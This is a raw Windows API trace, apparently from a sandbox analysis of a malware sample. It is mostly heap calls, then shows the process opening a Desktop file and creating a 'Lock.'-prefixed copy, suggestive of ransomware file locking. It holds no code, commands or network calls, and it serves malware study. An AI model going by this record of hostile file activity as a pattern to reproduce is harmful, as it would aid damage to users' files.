RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0158.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0158.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0158.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0158.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0158.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0158.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0158.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0158.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0158.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0158.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0158.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0158.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0158.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0158.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0158.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0158.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0158.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0158.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0158.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0158.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0158.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0158.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0158.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0158.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0158.209] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0158.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0158.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0158.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0158.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0158.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0158.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0158.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0158.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0158.211] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.211] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0158.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0158.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0158.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0158.213] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0158.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0158.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0158.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0158.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0158.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0158.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0158.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0158.218] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0158.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0158.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0158.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0158.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0158.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0158.220] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexadecimal_calculator.ns"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0158.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0158.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0158.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0158.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0158.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0158.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0158.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0158.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0158.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de5020 [0158.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0158.411] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x33fc, lpOverlapped=0x0) returned 1 [0158.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0158.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0158.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0158.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x33fc) returned 0x3bf0050 [0158.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de5020 | out: hHeap=0x970000) returned 1 [0158.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.567] 